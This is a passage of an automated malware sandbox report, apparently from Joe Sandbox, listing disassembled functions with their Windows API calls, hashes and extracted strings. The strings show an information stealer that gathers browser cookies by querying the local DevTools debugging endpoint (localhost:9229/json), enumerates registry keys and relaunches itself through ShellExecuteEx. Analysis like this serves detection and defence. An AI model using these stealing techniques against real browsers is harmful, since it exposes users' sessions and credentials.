                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 8fa8cf9de38ae8797b31cb003ac98a225790ebf3c417e2e18c93eadd11e47af1
                                • Instruction ID: cb4f28ea681b482f39354b936cf497d46e1a4ad7b0a8c029172f12047670effe
                                • Opcode Fuzzy Hash: 8fa8cf9de38ae8797b31cb003ac98a225790ebf3c417e2e18c93eadd11e47af1
                                • Instruction Fuzzy Hash: B5915E71600306ABEB709FB9EC88A2A7BEDAF14304F145468EBD6C7259DB7CD841DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 010047C5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004812
                                • lstrlen.KERNEL32(01024B60), ref: 0100481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100483A
                                • lstrcat.KERNEL32(00000000,01024B60), ref: 01004846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010048A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010048CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 010048DC
                                • lstrlen.KERNEL32(?), ref: 010048F0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004931
                                • lstrcpy.KERNEL32(00000000,?), ref: 010049B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 010049E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: c8f299a764bf5178e9b6a9eb14ae692a7721506fc06d5305d0d89a5a8e700999
                                • Instruction ID: 9440814701e83e1e06d3caa8231f313074be0f379a8bdf7f641a69880935456d
                                • Opcode Fuzzy Hash: c8f299a764bf5178e9b6a9eb14ae692a7721506fc06d5305d0d89a5a8e700999
                                • Instruction Fuzzy Hash: B5B1B631A102195BEF72EF79DC899AE7BF8AF40300F044468FA85E7291DB78DD419794
                                APIs
                                  • Part of subcall function 00FF90C0: InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF90DF
                                  • Part of subcall function 00FF90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FF90FC
                                  • Part of subcall function 00FF90C0: InternetCloseHandle.WININET(00000000), ref: 00FF9109
                                • strlen.MSVCRT ref: 00FF92E1
                                • strlen.MSVCRT ref: 00FF92FA
                                  • Part of subcall function 00FF8980: std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                • strlen.MSVCRT ref: 00FF9399
                                • strlen.MSVCRT ref: 00FF93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00FF9547
                                • lstrcat.KERNEL32(?,01021794), ref: 00FF9559
                                • lstrcat.KERNEL32(?,?), ref: 00FF956A
                                • lstrcat.KERNEL32(?,01024B98), ref: 00FF957C
                                • lstrcat.KERNEL32(?,?), ref: 00FF958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00FF959F
                                • lstrlen.KERNEL32(?), ref: 00FF95B6
                                • lstrlen.KERNEL32(?), ref: 00FF95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 95012ab9dc16eb2bada67172d87a416a9b46fc4cffa74fdb376e456ee74138a4
                                • Instruction ID: 66cefe134fd343dd7527c61270c0f77063f4eab4042788fcf9727ec0fbfaf242
                                • Opcode Fuzzy Hash: 95012ab9dc16eb2bada67172d87a416a9b46fc4cffa74fdb376e456ee74138a4
                                • Instruction Fuzzy Hash: 2DE12771E0421CDBDF60DFA8D884AEDBBB5BF48300F1444A9E609A7291DB789E45DF90
                                APIs
                                • memset.MSVCRT ref: 0100D9A1
                                • memset.MSVCRT ref: 0100D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 0100DA1C
                                • lstrcat.KERNEL32(?,00D6EEB0), ref: 0100DA36
                                • lstrcat.KERNEL32(?,?), ref: 0100DA4A
                                • lstrcat.KERNEL32(?,00D6D248), ref: 0100DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100DA95
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100DAFE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: f5098ffcb71fb8ca603d525a5be37d3e2d827a4132ab0558f07c3258c44209cd
                                • Instruction ID: d1b205e7b40038895abbe028ce8e65b27e1d80bea9c767ce522848f9f07ba1ff
                                • Opcode Fuzzy Hash: f5098ffcb71fb8ca603d525a5be37d3e2d827a4132ab0558f07c3258c44209cd
                                • Instruction Fuzzy Hash: C6B1A47191021DAFEF61EFA4DC889EE7BB9BF48300F0445A8F645E7250DB789A44DB60
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB3D9
                                • lstrlen.KERNEL32(01024C50), ref: 00FFB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB474
                                • lstrcat.KERNEL32(00000000,01024C50), ref: 00FFB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB4A9
                                • lstrlen.KERNEL32(00000000), ref: 00FFB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB587
                                • lstrlen.KERNEL32(01024AD4), ref: 00FFB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB622
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FFB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB65E
                                • lstrlen.KERNEL32(?), ref: 00FFB767
                                • lstrlen.KERNEL32(?), ref: 00FFB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB79E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 58c192e309b2908692bb85943ed08060e02ca39c5efd1ef4779e43287ac0e440
                                • Instruction ID: 88db11602f94d54cc5c9076974d8524ba984829d1c21f0cb82d9e65c616b108e
                                • Opcode Fuzzy Hash: 58c192e309b2908692bb85943ed08060e02ca39c5efd1ef4779e43287ac0e440
                                • Instruction Fuzzy Hash: 78026C30A01209DFCB35DF25D989A7EB7B4AF40324F18806DE6099B275D779DC82EB80
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • RegOpenKeyExA.ADVAPI32(?,00D6B7B8,00000000,00020019,?), ref: 010137BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 010137F7
                                • wsprintfA.USER32 ref: 01013822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 01013840
                                • RegCloseKey.ADVAPI32(?), ref: 0101384E
                                • RegCloseKey.ADVAPI32(?), ref: 01013858
                                • RegQueryValueExA.ADVAPI32(?,00D6E940,00000000,000F003F,?,?), ref: 010138A1
                                • lstrlen.KERNEL32(?), ref: 010138B6
                                • RegQueryValueExA.ADVAPI32(?,00D6EB50,00000000,000F003F,?,00000400), ref: 01013927
                                • RegCloseKey.ADVAPI32(?), ref: 01013972
                                • RegCloseKey.ADVAPI32(?), ref: 01013989
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 8185ed884f7c5051bdba2659a6dd0e1356456bddfdbf588d112a8987d7be5517
                                • Instruction ID: 4980094a18936f4010afb2a97f18a2b9700e2d83b80bb775c0530e149d04a568
                                • Opcode Fuzzy Hash: 8185ed884f7c5051bdba2659a6dd0e1356456bddfdbf588d112a8987d7be5517
                                • Instruction Fuzzy Hash: F1918272D002199FCB20DF98D9849EEB7F9FF48314F1485A9E609AB205D739AD46CF90
                                APIs
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FF90FC
                                • InternetCloseHandle.WININET(00000000), ref: 00FF9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00FF9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00FF9197
                                • InternetCloseHandle.WININET(00000000), ref: 00FF91A2
                                • InternetCloseHandle.WININET(00000000), ref: 00FF91A9
                                • strlen.MSVCRT ref: 00FF91BA
                                • strlen.MSVCRT ref: 00FF91ED
                                • strlen.MSVCRT ref: 00FF922E
                                • strlen.MSVCRT ref: 00FF924C
                                  • Part of subcall function 00FF8980: std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: a0fc2df446c107ae4d57cc1a290a6b47ed0ced8ca64b4d995f20848028cd4111
                                • Instruction ID: b8a9ba6678104873944285746bf2e3daeba138216450a39b5ea7755e9c9a9d31
                                • Opcode Fuzzy Hash: a0fc2df446c107ae4d57cc1a290a6b47ed0ced8ca64b4d995f20848028cd4111
                                • Instruction Fuzzy Hash: 4551E671A402096BEB20DFA9DC49FEEB7F9DF48710F140069F644E7290DBB4EA448B65
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 010116A1
                                • lstrcpy.KERNEL32(00000000,00D5A0A0), ref: 010116CC
                                • lstrlen.KERNEL32(?), ref: 010116D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010116F6
                                • lstrcat.KERNEL32(00000000,?), ref: 01011704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101172A
                                • lstrlen.KERNEL32(00D6E468), ref: 0101173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011762
                                • lstrcat.KERNEL32(00000000,00D6E468), ref: 0101176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011792
                                • ShellExecuteEx.SHELL32(?), ref: 010117CD
                                • ExitProcess.KERNEL32 ref: 01011803
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a03c342cd039d19ada5e3f322c72e7109aa113bfe093910d737084d9c80c2f93
                                • Instruction ID: c2877fe9c745d82b3eada1425aafd320145cf447aaf3f07d19d4a2238e48c27c
                                • Opcode Fuzzy Hash: a03c342cd039d19ada5e3f322c72e7109aa113bfe093910d737084d9c80c2f93
                                • Instruction Fuzzy Hash: F451B470901219ABDB71DFB8D888A9EBBFDBF48300F044165E705E3355DB78AA01DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0100F026
                                • lstrlen.KERNEL32(00000000), ref: 0100F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 0100F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 0100F081
                                • lstrlen.KERNEL32(?), ref: 0100F094
                                • lstrlen.KERNEL32(00000000), ref: 0100F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100F13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
